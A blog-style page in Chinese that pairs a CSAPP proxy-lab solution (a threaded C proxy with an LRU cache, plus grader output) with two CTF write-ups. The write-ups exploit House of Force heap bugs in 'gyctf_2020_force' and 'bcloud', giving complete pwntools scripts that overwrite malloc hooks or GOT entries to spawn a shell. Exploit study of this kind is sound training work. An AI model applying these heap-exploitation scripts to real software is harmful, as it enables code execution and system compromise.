cache需要牺牲缓存块时，运用LRU算法
在实现过程中需要解决不同线程同时访问cache的问题

定义cache结构体

#define TYPES 6
extern const int cache_block_size[];
extern const int cache_cnt[];

typedef struct cache_block{
    char* url;				/* 用于唯一确定所需要的cache */
    char* data;				/* cache中存放的数据 */
    int datasize;			/* 数据的长度 */
    int64_t time;			/* 当前用户的时间*/
    pthread_rwlock_t rwlock; /* 锁的状态 */
} cache_block;

typedef struct cache_type{
    cache_block *cacheobjs; /* 指向“存储客户端的请求消息”的内存空间 */
    int size;
} cache_type;

cache_type caches[TYPES];

LRU(基于系统时间)+隐式+暴力获取(直接遍历所有cache)

const int cache_block_size[] = {102, 1024, 5120 ,10240,25600, 102400};
const int cache_cnt[] = {40,20,20,10,12,5};
int64_t currentTimeMillis();

/* cache初始化 */
void init_cache()
{
    int i = 0;
    for (; i < TYPES; i++) {
        /* 不同组的cache大小不同,组数也不同 */
        caches[i].size = cache_cnt[i];
        caches[i].cacheobjs 
              = (cache_block *)malloc(cache_cnt[i] * sizeof(cache_block));
        cache_block *j = caches[i].cacheobjs;
        int k;
        for (k = 0; k < cache_cnt[i]; j++, k++) {
            /* 把组中每一个元素的各个区域进行操作(重置为"0"或申请存储区) */
            j->time = 0;
            j->datasize = 0;
            j->url = malloc(sizeof(char) * MAXLINE);
            strcpy(j->url,"");
            j->data = malloc(sizeof(char) * cache_block_size[i]);
            memset(j->data,0,cache_block_size[i]);
            pthread_rwlock_init(&j->rwlock,NULL);
            /* 初始化一个读写锁 */
        }
    }
}

void free_cache() {
    int i = 0;
    for (; i < TYPES; i++) {
        cache_block *j = caches[i].cacheobjs;
        int k;
        for (k = 0; k < cache_cnt[i]; j++, k++) {
            free(j->url);
            free(j->data);
            pthread_rwlock_destroy(&j->rwlock);
            /* 释放读写锁 */
        }
        free(caches[i].cacheobjs);
    }
}

int read_cache(char *url,int fd){
    
    int tar = 0, i = 0;
    cache_type cur;
    cache_block *p;
    printf("read cache %s \n", url);
    for (; tar < TYPES; tar++) {
        /* 遍历cache中的信息,依次对比url */
        cur = caches[tar];
        p = cur.cacheobjs;
        for(i=0;i < cur.size; i++,p++){
            if(p->time != 0 && strcmp(url,p->url) == 0) break;
        }
        if (i < cur.size) break;     
    }

    if(i == cur.size){
        printf("read cache fail\n");
        return 0;
    }
    pthread_rwlock_rdlock(&p->rwlock);
    /* 读锁定读写锁 */
    if(strcmp(url,p->url) != 0){
        pthread_rwlock_unlock(&p->rwlock);
        /* 解锁读写锁 */
        return 0;
    }
    pthread_rwlock_unlock(&p->rwlock);
    /* 解锁读写锁 */
    if (!pthread_rwlock_trywrlock(&p->rwlock)) {
        /* 非阻塞写锁定 */
        p->time = currentTimeMillis();
        /* 返回当前的计算机时间 */
        pthread_rwlock_unlock(&p->rwlock); 
        /* 解锁读写锁 */
    }
    pthread_rwlock_rdlock(&p->rwlock);
    /* 读锁定读写锁 */
    Rio_writen(fd,p->data,p->datasize);
    pthread_rwlock_unlock(&p->rwlock);
    /* 解锁读写锁 */
    printf("read cache successful\n");
    return 1;
}

void write_cache(char *url, char *data, int len){
    int tar = 0;
    for (; tar < TYPES && len > cache_block_size[tar]; tar++) ;
    printf("write cache %s %d\n", url, tar);
    /* 寻找空cache块 */
    cache_type cur = caches[tar];
    cache_block *p = cur.cacheobjs, *pt;
    int i;
    for(i=0;i < cur.size;i++,p++){
        if(p->time == 0){
            break;
        }
    }
	/* 实现LRU */
    int64_t min = currentTimeMillis();
    if(i == cur.size){
        for(i=0,pt = cur.cacheobjs;i<cur.size;i++,pt++){
            if(pt->time <= min){
                min = pt->time;
                p = pt;
            }
        }
    }
    pthread_rwlock_wrlock(&p->rwlock);
    /* 写锁定读写锁 */
    p->time = currentTimeMillis();
    p->datasize = len;
    memcpy(p->url,url,MAXLINE);
    memcpy(p->data,data,len);
    pthread_rwlock_unlock(&p->rwlock);
    /* 解锁读写锁 */
    printf("write Cache\n");
}

int64_t currentTimeMillis() {
  struct timeval time;
  gettimeofday(&time, NULL);
    /* 把目前的时间通过time所指的结构返回,当地时区的信息则放到NULL所指的结构中 */
  int64_t s1 = (int64_t)(time.tv_sec) * 1000;
  int64_t s2 = (time.tv_usec / 1000);
  return s1 + s2;
}

关于锁我没有深入学习，这里挂个博客：读写锁函数说明

最后需要把这些函数插入到原来的代码中：

#include <stdio.h>
#include "csapp.h"
/* Recommended max cache and object sizes */
#define MAX_CACHE_SIZE 1049000
#define MAX_OBJECT_SIZE 102400

/* You won't lose style points for including this long line in your code */
static const char* user_agent_hdr = "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3\r\n";
static const char* conn_hdr = "Connection: close\r\n";
static const char* prox_hdr = "Proxy-Connection: close\r\n";

#define TYPES 6
extern const int cache_block_size[];
extern const int cache_cnt[];

typedef struct cache_block {
    char* url;
    char* data;
    int datasize;
    int64_t time;
    pthread_rwlock_t rwlock;
} cache_block;

typedef struct cache_type {
    cache_block* cacheobjs; /* 指向“存储客户端的请求消息”的内存空间 */
    int size;
} cache_type;

cache_type caches[TYPES];


void doit(int fd);
void clienterror(int fd, char* cause, char* errnum,
    char* shortmsg, char* longmsg);
void parse_uri(char* uri, char* hostname, char* path, int* port);
void* thread(void* vargp);
void init_cache();
int read_cache(char* url, int fd);
void write_cache(char* url, char* data, int len);
void free_cache();

const int cache_block_size[] = { 102, 1024, 5120 ,10240,25600, 102400 };
const int cache_cnt[] = { 40,20,20,10,12,5 };
int64_t currentTimeMillis();

void init_cache()
{
    int i = 0;
    for (; i < TYPES; i++) {
        caches[i].size = cache_cnt[i];
        caches[i].cacheobjs
            = (cache_block*)malloc(cache_cnt[i] * sizeof(cache_block));
        cache_block* j = caches[i].cacheobjs;
        int k;
        for (k = 0; k < cache_cnt[i]; j++, k++) {
            j->time = 0;
            j->datasize = 0;
            j->url = malloc(sizeof(char) * MAXLINE);
            strcpy(j->url, "");
            j->data = malloc(sizeof(char) * cache_block_size[i]);
            memset(j->data, 0, cache_block_size[i]);
            pthread_rwlock_init(&j->rwlock, NULL);
        }
    }
}

void free_cache() {
    int i = 0;
    for (; i < TYPES; i++) {
        cache_block* j = caches[i].cacheobjs;
        int k;
        for (k = 0; k < cache_cnt[i]; j++, k++) {
            free(j->url);
            free(j->data);
            pthread_rwlock_destroy(&j->rwlock);
        }
        free(caches[i].cacheobjs);
    }
}

int read_cache(char* url, int fd) {
    int tar = 0, i = 0;
    cache_type cur;
    cache_block* p;
    printf("read cache %s \n", url);
    for (; tar < TYPES; tar++) {
        cur = caches[tar];
        p = cur.cacheobjs;
        for (i = 0; i < cur.size; i++, p++) {
            if (p->time != 0 && strcmp(url, p->url) == 0) break;
        }
        if (i < cur.size) break;
    }

    if (i == cur.size) {
        printf("read cache fail\n");
        return 0;
    }
    pthread_rwlock_rdlock(&p->rwlock);
    if (strcmp(url, p->url) != 0) {
        pthread_rwlock_unlock(&p->rwlock);
        return 0;
    }
    pthread_rwlock_unlock(&p->rwlock);
    if (!pthread_rwlock_trywrlock(&p->rwlock)) {
        p->time = currentTimeMillis();
        pthread_rwlock_unlock(&p->rwlock);
    }
    pthread_rwlock_rdlock(&p->rwlock);
    Rio_writen(fd, p->data, p->datasize);
    pthread_rwlock_unlock(&p->rwlock);
    printf("read cache successful\n");
    return 1;
}

void write_cache(char* url, char* data, int len) {
    int tar = 0;
    for (; tar < TYPES && len > cache_block_size[tar]; tar++);
    printf("write cache %s %d\n", url, tar);
    /* 寻找空cache块 */
    cache_type cur = caches[tar];
    cache_block* p = cur.cacheobjs, * pt;
    int i;
    for (i = 0; i < cur.size; i++, p++) {
        if (p->time == 0) {
            break;
        }
    }
    /* 实现LRU */
    int64_t min = currentTimeMillis();
    if (i == cur.size) {
        for (i = 0, pt = cur.cacheobjs; i < cur.size; i++, pt++) {
            if (pt->time <= min) {
                min = pt->time;
                p = pt;
            }
        }
    }
    pthread_rwlock_wrlock(&p->rwlock);
    p->time = currentTimeMillis();
    p->datasize = len;
    memcpy(p->url, url, MAXLINE);
    memcpy(p->data, data, len);
    pthread_rwlock_unlock(&p->rwlock);
    printf("write Cache\n");
}

int64_t currentTimeMillis() {
    struct timeval time;
    gettimeofday(&time, NULL);
    int64_t s1 = (int64_t)(time.tv_sec) * 1000;
    int64_t s2 = (time.tv_usec / 1000);
    return s1 + s2;
}


int main(int argc, char** argv)
{
    int listenfd, * connfd;
    pthread_t tid;
    char hostname[MAXLINE], port[MAXLINE];
    socklen_t clientlen;
    struct sockaddr_storage clientaddr;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <port>\n", argv[0]);
        exit(1);
    }
    signal(SIGPIPE, SIG_IGN);
    init_cache(); /* 新添:增加cache初始化操作 */
    listenfd = Open_listenfd(argv[1]);
    while (1) {
        printf("listening..\n");
        clientlen = sizeof(clientaddr);
        connfd = Malloc(sizeof(int));

        *connfd = Accept(listenfd, (SA*)&clientaddr, &clientlen);

        Getnameinfo((SA*)&clientaddr, clientlen, hostname, MAXLINE,
            port, MAXLINE, 0);
        printf("Accepted connection from (%s, %s)\n", hostname, port);
        Pthread_create(&tid, NULL, thread, connfd);
    }
    free_cache(); /* 新增:服务完成后释放cache */
    return 0;
}

void* thread(void* vargp)
{
    int connfd = *((int*)vargp);
    Pthread_detach(pthread_self());
    Free(vargp);
    doit(connfd);
    Close(connfd);
    return NULL;
}

void doit(int client_fd)
{
    int endserver_fd;
    char buf[MAXLINE], method[MAXLINE], uri[MAXLINE], version[MAXLINE];
    rio_t from_client, to_endserver;
    char hostname[MAXLINE], path[MAXLINE];
    int port;

    Rio_readinitb(&from_client, client_fd);

    if (!Rio_readlineb(&from_client, buf, MAXLINE))
        return;
    sscanf(buf, "%s %s %s", method, uri, version);
    if (strcasecmp(method, "GET")) {
        clienterror(client_fd, method, "501", "Not Implemented",
            "Proxy Server does not implement this method");
        return;
    }
    /* 新增:从cache中读取信息,如果读取成功返回给客户端(client_fd) */
    int ret = read_cache(uri, client_fd);
    if (ret == 1) {
        return;
    }

    parse_uri(uri, hostname, path, &port);
    char port_str[10];
    sprintf(port_str, "%d", port);
    endserver_fd = Open_clientfd(hostname, port_str);
    if (endserver_fd < 0) {
        printf("connection failed\n");
        return;
    }
    Rio_readinitb(&to_endserver, endserver_fd);

    char newreq[MAXLINE];
    sprintf(newreq, "GET %s HTTP/1.0\r\n", path);
    build_requesthdrs(&from_client, newreq, hostname);

    Rio_writen(endserver_fd, newreq, strlen(newreq));
    int n, size = 0; /* 新增:参数size */
    char data[MAX_OBJECT_SIZE];
    while ((n = Rio_readlineb(&to_endserver, buf, MAXLINE))) {
        /* 新增:cache存储的数据不能太大,过大的数据将会被丢弃 */
        if (size <= MAX_OBJECT_SIZE) {
            memcpy(data + size, buf, n);
            size += n;
        }
        printf("proxy received %d bytes,then send\n", n);
        Rio_writen(client_fd, buf, n);
    }
    printf("size: %d\n", size);
    /* 新增:在cache中写入信息,下次申请前会进行读取操作,读取到后立刻返回 */
    if (size < MAX_OBJECT_SIZE) {
        write_cache(uri, data, size);
    }
}

void clienterror(int fd, char* cause, char* errnum,
    char* shortmsg, char* longmsg)
{
    char buf[MAXLINE], body[MAXBUF];

    sprintf(body, "<html><title>Proxy Error</title>");
    sprintf(body, "%s<body bgcolor=""ffffff"">\r\n", body);
    sprintf(body, "%s%s: %s\r\n", body, errnum, shortmsg);
    sprintf(body, "%s<p>%s: %s\r\n", body, longmsg, cause);
    sprintf(body, "%s<hr><em>The Proxy Web server</em>\r\n", body);

    sprintf(buf, "HTTP/1.0 %s %s\r\n", errnum, shortmsg);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "Content-type: text/html\r\n");
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "Content-length: %d\r\n\r\n", (int)strlen(body));
    Rio_writen(fd, buf, strlen(buf));
    Rio_writen(fd, body, strlen(body));
}

void parse_uri(char* uri, char* hostname, char* path, int* port) {
    *port = 80;
    char* pos1 = strstr(uri, "//");
    if (pos1 == NULL) {
        pos1 = uri;
    }
    else pos1 += 2;

    char* pos2 = strstr(pos1, ":");
    if (pos2 != NULL) {
        *pos2 = '\0';
        strncpy(hostname, pos1, MAXLINE);
        sscanf(pos2 + 1, "%d%s", port, path);
        *pos2 = ':';
    }
    else {
        pos2 = strstr(pos1, "/");
        if (pos2 == NULL) {
            strncpy(hostname, pos1, MAXLINE);
            strcpy(path, "");
            return;
        }
        *pos2 = '\0';
        strncpy(hostname, pos1, MAXLINE);
        *pos2 = '/';
        strncpy(path, pos2, MAXLINE);
    }
}

void build_requesthdrs(rio_t* rp, char* newreq, char* hostname, char* port) {
    char buf[MAXLINE];

    while (Rio_readlineb(rp, buf, MAXLINE) > 0) {
        if (!strcmp(buf, "\r\n")) break;
        if (strstr(buf, "Host:") != NULL) continue;
        if (strstr(buf, "User-Agent:") != NULL) continue;
        if (strstr(buf, "Connection:") != NULL) continue;
        if (strstr(buf, "Proxy-Connection:") != NULL) continue;

        sprintf(newreq, "%s%s", newreq, buf);
    }
    sprintf(newreq, "%sHost: %s:%s\r\n", newreq, hostname, port);
    sprintf(newreq, "%s%s%s%s", newreq, user_agent_hdr, conn_hdr, prox_hdr);
    sprintf(newreq, "%s\r\n", newreq);
}

打分：

*** Cache ***
Starting tiny on port 10306
Starting proxy on port 2574
Fetching ./tiny/tiny.c into ./.proxy using the proxy
Fetching ./tiny/home.html into ./.proxy using the proxy
Fetching ./tiny/csapp.c into ./.proxy using the proxy
Killing tiny
Fetching a cached copy of ./tiny/home.html into ./.noproxy
Success: Was able to fetch tiny/home.html from the cache.
Killing proxy
cacheScore: 15/15

totalScore: 70/70

House Of Force-2.23-64

Posted on 2022-03-05 In Pwn train 5.4k 5 mins.

gyctf_2020_force

1
2
3

➜  [/home/ywhkkx/桌面] ./gyctf_2020_force 
1:add
2:puts

gyctf_2020_force: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=6d464fea7805860b83ff9bc8f4467dd258ebd04f, stripped
 
[*] '/home/ywhkkx/桌面/gyctf_2020_force'
    Arch:     amd64-64-little
    RELRO:    Full RELRO // 打不了GOT劫持
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

64位，dynamically，全开

void __fastcall __noreturn main(int a1, char **a2, char **a3)
{
  __int64 choice; // rax
  char s[256]; // [rsp+10h] [rbp-110h] BYREF
  unsigned __int64 v5; // [rsp+118h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  memset(s, 255, sizeof(s));
  while ( 1 )
  {
    memset(s, 255, sizeof(s));
    puts("1:add");
    puts("2:puts");
    read(0, data, 0xFuLL);
    choice = atol(data);
    if ( choice == 1 )
    {
      add();
    }
    else if ( choice == 2 )
    {
      puts_s();
    }
  }
}

标准堆模板

unsigned __int64 add()
{
  const void **i; // [rsp+0h] [rbp-120h]
  __int64 size; // [rsp+8h] [rbp-118h]
  char s[256]; // [rsp+10h] [rbp-110h] BYREF
  unsigned __int64 v4; // [rsp+118h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  memset(s, 255, sizeof(s));
  for ( i = (const void **)&chunk_list; *i; ++i )
    ;
  if ( (char *)i - (char *)&chunk_list > 39 )
    exit(0);
  puts("size");
  read(0, data, 0xFuLL);
  size = atol(data);
  *i = malloc(size);
  if ( !*i )
    exit(0);
  printf("bin addr %p\n", *i);
  puts("content");
  read(0, (void *)*i, 0x50uLL);                 // 堆溢出
  puts("done");
  return __readfsqword(0x28u) ^ v4;
}

有一个溢出，输入“size”，读入“0x50”字节

unsigned __int64 puts_s()
{
  unsigned __int64 carnay; // [rsp+8h] [rbp-8h]

  carnay = __readfsqword(0x28u);
  puts(&leak);
  return __readfsqword(0x28u) ^ carnay;
}

只能利用这个函数打 leak

入侵思路

先利用 mmap 获取 libc_base：

chunk1=add(0x200000,'here')
libc_base=chunk1+0x200ff0
success('chunk1 >> '+hex(chunk1))
success('libc_base >> '+hex(libc_base))

修改“topchunk->size”为“0xffffffffffffffff”：

1
2
3

chunk2=add(0x20,'a'*40+p64(0xffffffffffffffff))
topchunk_addr=0x55e87208e290+48
success('topchunk_addr >> '+hex(topchunk_addr))

1
2
3

Allocated chunk | PREV_INUSE | IS_MMAPED | NON_MAIN_ARENA
Addr: 0x55e87208e2c0
Size: 0xffffffffffffffff

计算 offset 分割 top chunk：

offset=malloc_hook-(topchunk_addr+0x10)-0x20
add(offset, 'kkk\n')
magic_addr=add(0x40, 'yhellow\n')
success('magic_addr >> '+hex(magic_addr))

[+] magic_addr >> 0x7f33a5420b00

pwndbg> telescope 0x7f33a5420b00
00:0000│  0x7f33a5420b00 (__memalign_hook) ◂— 0xa776f6c6c656879 ('yhellow\n')
01:0008│  0x7f33a5420b08 (__realloc_hook) —▸ 0x7f33a50e1a70 (realloc_hook_ini) ◂— push   r15
02:0010│  0x7f33a5420b10 (__malloc_hook) ◂— 0x0
03:0018│  0x7f33a5420b18 ◂— 0x0
04:0020│  0x7f33a5420b20 (main_arena) ◂— 0x100000000

注意：采用“offset=malloc_hook-(topchunk_addr+0x10)”（以前总结的规律），就会申请到“main_arena”，和预期“__malloc_hook”差了 0x10 字节，推测可能是那 1字节的误差搞得鬼（也是以前总结的规律），这 1字节导致 0x10字节对齐的程序“进位”了（当然有时不会有反应）

我们需要劫持“realloc_hook”为“one_gadget”，劫持“malloc_hook”为“realloc_hook+0x10”，所以只要在原来 offset 的基础上减 0x20 就好了：

offset=malloc_hook-(topchunk_addr+0x10)-0x20
add(offset, 'kkk\n')
magic_addr=add(0x40, 'a'*8+p64(one_gadget_libc)+p64(realloc+0x10))
success('magic_addr >> '+hex(magic_addr))

pwndbg> telescope 0x7f4aa6c3ab00
00:0000│  0x7f4aa6c3ab00 (__memalign_hook) ◂— 0x6161616161616161 ('aaaaaaaa')
01:0008│  0x7f4aa6c3ab08 (__realloc_hook) —▸ 0x7f4aa68bb27a (do_system+1098) ◂— mov    rax, qword ptr [rip + 0x37ec37]
02:0010│  0x7f4aa6c3ab10 (__malloc_hook) —▸ 0x7f4aa68fa720 (realloc+16) ◂— sub    rsp, 0x38
03:0018│  0x7f4aa6c3ab18 ◂— 0x0
04:0020│  0x7f4aa6c3ab20 (main_arena) ◂— 0x100000000

完整exp：

from pwn import*

p=process('./gyctf_2020_force')
elf=ELF('./gyctf_2020_force')
libc = ELF('./libc-2.23.so')

def add(size,content):
	p.sendline(str(1))
	p.sendlineafter('size\n',str(size))
	p.recvuntil('bin addr ')
	heap_addr=eval(p.recvuntil('\n')[:-1])
	success('heap_add >> '+hex(heap_addr))
	p.sendafter('content\n',content)
	return heap_addr
	
def put():
	p.sendline(str(2))

onegadget = [0x45226, 0x4527a, 0xf03a4, 0xf1247]

leak_offset=0xD93
chunk1=add(0x200000,'here')
libc_base=chunk1+0x200ff0
success('chunk1 >> '+hex(chunk1))
success('libc_base >> '+hex(libc_base))

chunk2=add(0x20,'a'*40+p64(0xffffffffffffffff))
topchunk_addr=chunk2+32
success('topchunk_addr >> '+hex(topchunk_addr))

malloc_hook=libc.sym['__malloc_hook']+libc_base
realloc=libc.sym["__libc_realloc"]+libc_base
one_gadget_libc=onegadget[1]+libc_base
success('malloc_hook >> '+hex(malloc_hook))
success('one_gadget_libc >> '+hex(one_gadget_libc))

offset=malloc_hook-(topchunk_addr+0x10)-0x20
add(offset, 'kkk\n')
magic_addr=add(0x40, 'a'*8+p64(one_gadget_libc)+p64(realloc+0x10))
success('magic_addr >> '+hex(magic_addr))

p.recvuntil("2:puts\n")
p.sendline('1')
p.recvuntil("size\n")
p.sendline(str(20))

p.interactive()

house of force 小结（2.23-64位）

通过本题目，我对 offset 的计算有了更深刻的理解，即使有时候 offse 有偏差也可以进行修正了

另外，我对 malloc_hook 的打法也有了新的认识：先劫持“realloc_hook”为“one_gadget”，后劫持“malloc_hook”为“realloc_hook+0x10”（不能直接劫持“malloc_hook”，目前不知道原因）

最后尝试了用 libc-2.27 来打 house of force，打不通，分析源码发现通不过检查（几乎打死了 house of force），得出结论：house of force 只能在 libc-2.23 中打（如果以后发现有大神可以绕过检查的话，就回来补充）

House Of Force-2.23-32

Posted on 2022-03-04 Edited on 2022-03-05 In Pwn train 11k 10 mins.

bcloud

➜  [/home/ywhkkx/桌面] ./bcloud 
Input your name:
ywhkkx
Hey ywhkkx! Welcome to BCTF CLOUD NOTE MANAGE SYSTEM!
Now let's set synchronization options.
Org:
hehe
Host:
heh
OKay! Enjoy:)
1.New note
2.Show note
3.Edit note
4.Delete note
5.Syn
6.Quit
option--->>

bcloud: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /home/ywhkkx/tool/glibc-all-in-one/libs/2.23-0ubuntu11.3_i386/ld-2.23.so, for GNU/Linux 2.6.24, BuildID[sha1]=96a3843007b1e982e7fa82fbd2e1f2cc598ee04e, stripped

[*] '/home/ywhkkx/桌面/bcloud'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8047000)

32位，dynamically，开了canary，开了NX

漏洞分析

void __cdecl readStr(char *str, int size, char a)
{
  char buf; // [esp+1Bh] [ebp-Dh] BYREF
  int i; // [esp+1Ch] [ebp-Ch]

  for ( i = 0; i < size; ++i )
  {
    if ( read(0, &buf, 1u) <= 0 )
      exit(-1);
    if ( buf == a )
      break;
    str[i] = buf;
  }
  str[i] = 0;                                   // off-by-one null
}

经典的一字节溢出

void delNote()
{
  int index; // [esp+18h] [ebp-10h]
  char *ptr; // [esp+1Ch] [ebp-Ch]

  puts("Input the id:");
  index = readInt();
  if ( index >= 0 && index <= 9 )
  {
    ptr = noteList[index];
    if ( ptr )
    {
      noteList[index] = 0;
      noteLens[index] = 0;
      free(ptr);                                // 未置空
      puts("Delete success.");
    }
    else
    {
      puts("Note has been deleted.");
    }
  }
  else
  {
    puts("Invalid ID.");
  }
}

free 没有置空指针，但是对“noteList”和“noteLens”进行了清零操作，使后续的修改模块无法获取这个chunk

入侵思路

首先要实现 leak，由于本程序的打印模块是假的：

void no_work()
{
  puts("WTF? Something strange happened.");
}

所以只有这一个位置可以打印：

void input_name()
{
  char name[64]; // [esp+1Ch] [ebp-5Ch] BYREF name可以溢出到*name_heap
  char *name_heap; // [esp+5Ch] [ebp-1Ch]
  unsigned int v2; // [esp+6Ch] [ebp-Ch]

  v2 = __readgsdword(0x14u);
  memset(name, 0, 0x50u);
  puts("Input your name:");
  readStr(name, 0x40, 10);
  name_heap = (char *)malloc(0x40u);
  name_list = (int)name_heap;
  strcpy(name_heap, name);                      // off-by-one null
  hello((int)name_heap);
}

void __cdecl hello(int a1)
{
  printf("Hey %s! Welcome to BCTF CLOUD NOTE MANAGE SYSTEM!\n", (const char *)a1);
  puts("Now let's set synchronization options.");
}

输入48个“a”的确可以溢出东西，但仍需要确定是什么：

p.readuntil("name:\n")
p.send("a"*0x40)

p.read(0x44)
heap = u32(p.read(4))
success("heap >> "+hex(heap))

pwndbg> stack 50
00:0000│ esp 0xffe16710 —▸ 0x8048e2c ◂— dec    eax /* 'Hey %s! Welcome to BCTF CLOUD NOTE MANAGE SYSTEM!\n' */
01:0004│     0xffe16714 —▸ 0x9cc1008 ◂— 0x61616161 ('aaaa')
02:0008│     0xffe16718 —▸ 0xffe1674c ◂— 0x61616161 ('aaaa')

pwndbg> x/20xw 0x9cc1008
0x9cc1008:	0x61616161	0x61616161	0x61616161	0x61616161
0x9cc1018:	0x61616161	0x61616161	0x61616161	0x61616161
0x9cc1028:	0x61616161	0x61616161	0x61616161	0x61616161
0x9cc1038:	0x61616161	0x61616161	0x61616161	0x61616161
0x9cc1048:	0x09cc1008	0x00020f00	0x00000000	0x00000000

地址“0x09cc1008”将会被泄露出来，它既是 heap 的首地址

为什么会这样呢？我刚开始以为是 off-by-null 的效果，后来仔细分析代码发现根本不是这个原因

1 2	char name[64]; // [esp+1Ch] [ebp-5Ch] BYREF char *name_heap; // [esp+5Ch] [ebp-1Ch]

1	name_heap = (char *)malloc(0x40u);

malloc 执行以后，返回的地址写入 name_heap，反向覆盖了 name 末尾的“\x00”，导致 name_heap 也可以被打印出来了（和 books 很像）

void input_oh()
{
  char org[64]; // [esp+1Ch] [ebp-9Ch] BYREF 溢出1字节到org_heap
  char *org_heap; // [esp+5Ch] [ebp-5Ch]
  char host[68]; // [esp+60h] [ebp-58h] BYREF
  char *host_heap; // [esp+A4h] [ebp-14h]
  unsigned int v4; // [esp+ACh] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  memset(org, 0, 0x90u);
  puts("Org:");
  readStr(org, 0x40, 10);                       // overflow 1字节
  puts("Host:");
  readStr(host, 0x40, 10);
  host_heap = (char *)malloc(0x40u);
  org_heap = (char *)malloc(0x40u); // 覆盖了org末尾的“\x00”
  org_list = (int)org_heap; 
  host_list = (int)host_heap;
  strcpy(host_heap, host);
  strcpy(org_heap, org); // 导致org+org_heap+host_heap一起被复制到了org_heap
  puts("OKay! Enjoy:)");
}

这个函数一看就有问题（交叉写入的方式，还有 off-by-one，很容易出漏洞）

和上一个函数一样的问题，导致 org + org_heap + host_heap 一起被复制到了 org_heap，我们可能可以控制 top chunk 的 size 了（org_heap 覆盖 top chunk->presize，host_heap 覆盖 top chunk->size）

p.readuntil("Org:")
p.send("a"*0x40)
p.readuntil("Host:")
p.sendline(p32(0xffffffff))
p.readuntil("Enjoy:")

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x824c000
Size: 0x49

Allocated chunk | PREV_INUSE
Addr: 0x824c048
Size: 0x49

Allocated chunk | PREV_INUSE
Addr: 0x824c090
Size: 0x49

Allocated chunk | PREV_INUSE | IS_MMAPED | NON_MAIN_ARENA
Addr: 0x824c0d8
Size: 0xffffffff
// top chunk addr - heap addr = 0xd8

现在 House Of Force 的条件已经准备好了，现在要考虑怎么打 House Of Force

先看修改模块：

void editNote()
{
  int index; // [esp+14h] [ebp-14h]
  char *note; // [esp+18h] [ebp-10h]
  int len; // [esp+1Ch] [ebp-Ch] len会被溢出

  puts("Input the id:");
  index = readInt();
  if ( index >= 0 && index <= 9 )
  {
    note = noteList[index];
    if ( note )
    {
      len = noteLens[index];
      syned[index] = 0;
      puts("Input the new content:");
      readStr(note, len, 10);                   // off-by-one
      puts("Edit success.");
    }
    else
    {
      puts("Note has been deleted.");
    }
  }
  else
  {
    puts("Invalid ID.");
  }
}

“noteList”（0x804B120）中的地址可以被修改模块控制，所以可以控制它来打hook劫持

现在来考虑的是：怎么分割 top chunk 来使 newchunk 分配到“noteList”上

void newNote()
{
  int i; // [esp+18h] [ebp-10h]
  int len; // [esp+1Ch] [ebp-Ch]

  for ( i = 0; i <= 9 && noteList[i]; ++i )
    ;
  if ( i == 10 )
  {
    puts("Lack of space. Upgrade your account with just $100 :)");
  }
  else
  {
    puts("Input the length of the note content:");
    len = readInt();
    noteList[i] = (char *)malloc(len + 4);
    if ( !noteList[i] )
      exit(-1);
    noteLens[i] = len;
    puts("Input the content:");
    readStr(noteList[i], len, 10);
    printf("Create success, the id is %d\n", i);
    syned[i] = 0;
  }
}

申请模块就没有什么价值了

打 House Of Force ，把 top chunk的数据区分割到 note_list：

note_list = 0x804B120
top_chunk_addr = heap + 0xD8 # top chunk 的首地址

offset = note_list - (top_chunk_addr + 0x8) - 24
# note_list - top_chunk_addr - 0x10 就可以保证 top chunk 被分割到 note_list
# 再减去"24"是为了保证new_note(0x10, "kkk")后，top chunk 被分割到 note_list
new_note(0x10, "kkk")
new_note(offset,'')

payload = p32(elf.got["free"])
payload += p32(elf.got["atoi"])
payload += p32(elf.got["atoi"])
new_note(0x100, payload)

申请 0x10 是为了在noteLens[0]中写入 0x10 (假设没有此操作，后续需要的字节数不能满足)

现在看看这个偏移是怎么算的：offset = note_list - top_chunk_addr - 0x8 - 24

new_note(0x10, “kkk”) 申请前：

1
2
3

Allocated chunk | PREV_INUSE | IS_MMAPED | NON_MAIN_ARENA
Addr: 0x9db20d8
Size: 0xffffffff

new_note(0x10, “kkk”) 申请后：

Allocated chunk | PREV_INUSE
Addr: 0x9db20d8
Size: 0x19 // 0x18(24)

Top chunk | PREV_INUSE
Addr: 0x9db20f0
Size: 0xffffffe1

1 2	In [2]: 0x9db20f0-0x9db20d8 Out[2]: 24

每次申请 “size” 字节的 chunk ，top thunk 都增加 “size” 字节，如果申请一个比较大的 “size” ，导致最高位溢出，就可能会申请到 note_list：

1 2	0x9db20f0 + 0x8 (top chunk data) + offset = 0x100804B120(note_list) offset = note_list - top chunk data

直接减也可以获取相似的效果（即使它是负数，也会被当成 unsigned long）

通过数学计算得：用这种操作会有1字节的误差，但是被内存对齐抵消了

GDB查看内存：

pwndbg> telescope 0x804B120
00:0000│  0x804b120 —▸ 0x804b014 (free@got.plt) —▸ 0x80484e6 (free@plt+6) ◂— push   0x10 // note_list[0]
01:0004│  0x804b124 —▸ 0x804b03c (atoi@got.plt) —▸ 0xf7d73260 (atoi) ◂— sub    esp, 0x10 // note_list[1]
02:0008│  0x804b128 —▸ 0x804b03c (atoi@got.plt) —▸ 0xf7d73260 (atoi) ◂— sub    esp, 0x10 // note_list[2]
03:000c│  0x804b12c ◂— 0x0

修改 note_list[0] 打 GOT 劫持：

edit_note(0, p32(elf.symbols["printf"]+6))
delete_note(1)
atoi_libc = u32(p.read(4))
p.readuntil("success.")
libc_base = atoi_libc - libc.symbols["atoi"]
print("libc_base >> " + hex(libc_base))

system = libc.symbols["system"] + libc_base
edit_note(2, p32(system))

p.sendline("/bin/sh")
